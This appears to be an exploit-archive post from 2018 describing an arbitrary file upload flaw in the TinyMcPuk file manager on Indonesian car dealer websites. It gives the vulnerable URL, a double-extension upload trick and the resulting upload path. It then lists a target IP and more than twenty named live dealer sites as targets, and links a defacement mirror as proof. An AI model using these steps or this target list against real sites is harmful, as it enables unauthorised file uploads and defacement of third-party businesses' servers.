facebook facebook twitter rss

Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability
# Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage => mediatechindonesia.com
# Google Dork => All rights reserved. © 2015 Media Tech Indonesia
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018050180
# Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html

#################################################################################

Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm

Please upload your file as => /yourfilename.htm.fla

Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla

#################################################################################

Example Sites and Target IP => 103.27.206.203

daihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

toyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

promosidoarjodaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

promomobiltoyotasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

promomobiltoyotasidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

promomobiltoyotajatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

salestoyotagresik.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

saleshondasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

swalayanrak.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukiwarusurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukiumcsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukisbtsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukisbtmalang.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukimurahsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukimobilsurabaya.net/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukimobilsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

surabayadaihatsu.info/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

surabayadaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

umcsuzukipasuruan.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

umcsuzukijatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406

#################################################################################

Discovered By : KingSkrupellos from Cyberizm.Org

#################################################################################

Like us on Facebook :